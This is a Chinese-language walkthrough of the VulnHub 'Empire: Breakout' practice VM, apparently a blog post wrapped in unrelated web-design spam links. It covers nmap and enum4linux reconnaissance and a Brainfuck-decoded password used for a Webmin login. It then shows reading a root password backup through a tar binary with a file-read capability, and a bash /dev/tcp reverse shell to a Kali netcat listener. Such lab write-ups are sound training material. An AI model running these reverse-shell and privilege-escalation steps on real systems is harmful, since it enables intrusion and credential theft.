当前位置: 首页 > news >正文

兰州做家教去哪个网站比较好海淀企业型网站建设

兰州做家教去哪个网站比较好,海淀企业型网站建设,校园网站建设中期报告,金水区做网站#x1f36c; 博主介绍 #x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 _PowerShell #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 #x1f389;点赞➕评论➕收藏 养成习… 博主介绍 ‍ 博主介绍大家好我是 _PowerShell 很高兴认识大家~ ✨主攻领域【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 Vulhub是一个面向大众的开源漏洞靶场无需docker知识简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单让安全研究者更加专注于漏洞原理本身。 文章目录 博主介绍一、环境搭建1、下载靶场环境2、启动靶场环境二、渗透靶场1、目标2、信息收集查看端口和服务3、访问80端口发现提示信息得到一个密码1.访问一下web2.查看源码发现一段提示3.翻译解密提示信息4.brainfuck 语言简介4、访问10000和20000端口发现两个登录页1.访问10000端口2.访问20000端口5、收集有关靶机smb的信息获取到用户名cyber1.思路2.收集smb信息3.Enum4linux介绍6、利用获取的用户名和密码成功登录20000端口7、获取普通用户权限获取第一个flag8、获取root用户权限获取第一个flag1.查看当前权限2.发现tar可进行任意文件读取3.linux setcap命令的信息4.发现备份文件.old_pass.bak5.利用tar读取密码备份文件6.成功读取root密码7.发现网页命令行无法执行su命令8.反弹靶机shell到kali方式解决上述问题9.使用root密码登录root用户提权成功三、相关资源一、环境搭建 1、下载靶场环境 靶场下载地址 https://www.vulnhub.com/entry/empire-breakout,751/下载下来的文件如下 2、启动靶场环境 下载下来是虚拟机压缩文件直接用Vmvare导入就行。 设置虚拟机名称 导入中 导入完成之后打开后把网络模式设置为NAT模式。 虚拟机开启之后界面如下我们可以看到虚拟机ip192.168.233.175 二、渗透靶场 1、目标 目标就是我们搭建的靶场靶场IP为 192.168.233.1752、信息收集查看端口和服务 Nmap扫描靶机查看开启的端口和服务 nmap -sS -p 0-65535 -Pn -O 192.168.233.175发现开放了80端口存在WEB 开放了139445端口存在SMB共享服务 开启了10000、20000端口存在Webmin MiniServ服务Webmin 是功能强大的基于 Web 的 Unix/linux 系统管理工具。管理员通过浏览器访问 Webmin 的各种管理功能并完成相应的管理操作。 3、访问80端口发现提示信息得到一个密码 1.访问一下web http://192.168.233.175/2.查看源码发现一段提示 !--dont worry no one will get here, its safe to share with you my access. Its encrypted :) [-]...----..-----------.-----------...-.--------..------------.---------...--3.翻译解密提示信息 提示的大概意思就是 翻译过来时别担心没有人会来这里和你分享我的权限是安全的。它是加密的 也就是说这段奇奇怪怪的代码是加密文件我们需要将他进行解密这应该是密码经过某种加密或者编码形成的经过一段时间的查找发现是ook加密是brainfuck加密方法的一种 我们进行解密解密工具https://ctf.bugku.com/tool/brainfuck 解密过后是 .2uqPEfj3DP’a-34.brainfuck 语言简介 brainfuck 语言用 - . , [ ] 八种符号来替换C语言的各种语法和命令具体规则如下 Brainfuck 编程语言由八个命令组成每个命令都表示为一个字符。 增加指针。 减少指针。 增加指针处的字节。 - 减少指针处的字节。 . 输出指针处的字节。 , 输入一个字节并将其存储在指针处的字节中。 [ 跳过匹配项] 如果指针处的字节为零。 ] 向后跳转到匹配的 [ 除非指针处的字节为零。 Brainfuck 命令的语义也可以用 C 语言简洁地表达如下假设 p 之前已定义为 char* 变为 p; 变成 --p; 变为 *p - 变成 --*p; . 变成 putchar(*p); , 变成 *p getchar(); [ 变成 while (*p) { ] 变成 } 4、访问10000和20000端口发现两个登录页 有一种强烈的预感这是一段密码先记录下来接着我们继续查看另外两个网站 10000端口和20000端口是不同的登录系统一个是登录网站的一个是登录用户的 1.访问10000端口 https://192.168.233.175:10000/session_login.cgi2.访问20000端口 https://192.168.233.175:20000/5、收集有关靶机smb的信息获取到用户名cyber 1.思路 鉴于我们已经有了用户的密码所以我们要着手寻找用户名了 由于靶机开放了smb服务所以我们可以收集有关靶机smb的信息 2.收集smb信息 使用命令enum4linux可以收集大量的信息 enum4linux 192.168.233.175最终发现了一个用户名cyber 3.Enum4linux介绍 Enum4linux是一个用于枚举来自Windows和Samba系统的信息的工具。 它试图提供与以前从www.bindview.com可用的enum.exe类似的功能。它是用Perl编写的基本上是一个包装Samba工具smbclientrpclientnet和nmblookup。 用法: ./enum4linux.pl [选项] ip地址枚举选项-U 获取用户列表-M 获取机器列表*-S 获取共享列表-P 获取密码策略信息-G 获取组和成员列表-d 详述适用于-U和-S-u user 用户指定要使用的用户名默认-p pass 指定要使用的密码默认为以下选项是enum.exe未实现的: -L, -N, -D, -f其他选项:-a 做所有简单枚举-U -S -G -P -r -o -n -i如果您没有提供任何其他选项则启用此选项-h 显示此帮助消息并退出-r 通过RID循环枚举用户-R range RID范围要枚举默认值500-550,1000-1050隐含-r-K n 继续搜索RID直到n个连续的RID与用户名不对应Impies RID范围结束于999999.对DC有用-l 通过LDAP 389 / TCP获取一些有限的信息仅适用于DN-s 文件暴力猜测共享名称-k user 远程系统上存在的用户默认值administratorguestkrbtgtdomain adminsrootbinnone用于获取sid与“lookupsid known_username”使用逗号尝试几个用户“-k adminuser1user2”-o 获取操作系统信息-i 获取打印机信息-w wrkg 手动指定工作组通常自动找到-n 做一个nmblookup类似于nbtstat -v 详细输出显示正在运行的完整命令netrpcclient等6、利用获取的用户名和密码成功登录20000端口 由于20000端口是登录用户的我们拿用户名cyber和之前获得的密码去登录一下20000端口登陆成功 7、获取普通用户权限获取第一个flag 登录进去摸索了一会儿发现左下角有一个终端的图标点进去之后就可以运行命令了 进入命令行执行ls发现有一个user.txt文件使用cat查看得到第一个flag ls cat user.txt8、获取root用户权限获取第一个flag 1.查看当前权限 执行whoami发现是用户权限 whoami2.发现tar可进行任意文件读取 通过ls -l查看文件权限发现tar具有执行权限猜想他是一个可执行文件 ls -l通过getcap命令查看文件拥有的权限是什么 getcap tar发现cap_dac_read _searchep说明他是可以读取任意文件的 3.linux setcap命令的信息 https://blog.csdn.net/megan_free/article/details/100357702\4.发现备份文件.old_pass.bak 既然给了我们一个可进行任意读取的可执行文件那就肯定是要我们找一个文件来读取获得root的密码。 经过一段时间的寻找之后发现/var/backups下有个备份文件.old_pass.bak 5.利用tar读取密码备份文件 我们用tar把它打包之后再解压出来就没有权限问题了 ./tar -cvf pass.tar /var/backups/.old_pass.bak tar -xvf pass.tar这里打包的时候一定要使用./tar不然会提示没权限没有加./代表的是你用的系统安装的tar不是这个目录下的tar就不一定会有读取任意文件的权限 我们的用户目录下多了两个文件 6.成功读取root密码 cat var/backups/.old_pass.bak得到root密码 Ts4YurgtRX(~h7.发现网页命令行无法执行su命令 切换到root用户 su root发现这里执行不了su 8.反弹靶机shell到kali方式解决上述问题 反弹shell后 那那那我干脆反弹一个shell到我的kali吧 Kali监听 nc -lvvp 55555靶机连接 bash -i /dev/tcp/192.168.233.130/55555 01攻击机获取到靶机的shell 9.使用root密码登录root用户提权成功 切换到root用户 su root执行whoami 发现是root权限提权成功 得到第二个flag cd /root cat rOOt.txt三、相关资源 1、靶场下载地址 2、ook在线解密工具 3、enum4linux枚举工具 4、Brainfuck介绍 5、[ 隧道技术 ] 反弹shell的集中常见方式二bash 反弹shell 6、[ 隧道技术 ] 反弹shell的集中常见方式一nc反弹shell
http://www.w-s-a.com/news/989318/

相关文章:

  • 中山企业做网站昆明做网站价格
  • wordpress 新网站 代码网站可以做系统还原吗
  • 百度给做网站公司餐饮设计装饰公司
  • 专门卖医疗器械的网站网站建设方案一份
  • 吉林省建设安全监督站网站wordpress 4.7.5下载
  • 网页制作视频的网站建设营销策划公司
  • 玉雕网站建设八点品牌设计公司招聘
  • 服务器可以自己的网站吗flash 网站 源码
  • 湖南做网站 搜搜磐石网络网站注册收入
  • 北京软件网站开发装修设计培训机构
  • 哪个网站能帮助做路书网站建设的技巧
  • 上海网站备案在哪里在国外怎么做网站
  • 做网站得花多钱乡村振兴网站建设
  • 站设计培训课程wordpress自动回复
  • 上海闵行区 网站建设永久免费crm软件下载
  • 天津营销网站建设公司排名台州网站排名公司
  • 环保网站 怎么做物流网站的功能与特色
  • 网站多久才会被收录服务器租用泰海
  • 电商网站建设合同模板临汾推广型网站建设
  • 天猫商务网站建设目的长春网站设计
  • 公司网站建设会议纪要昆山高端网站建设机构
  • 做消费网站流程深圳网站设计价格
  • 做电影网站怎么接广告中国最新军事新闻视频
  • 网站推广设计做哪些设置自动删除的wordpress
  • 东莞东坑网站设计专业网站制作设
  • 网站怎么做现场直播视频成都科技网站建设找
  • 个人网页设计步骤网站没有内容 能做优化吗
  • 专业网站建设公司招聘网站排行榜
  • 网站建设规范方法企业解决方案架构
  • ae做网站导航wordpress门户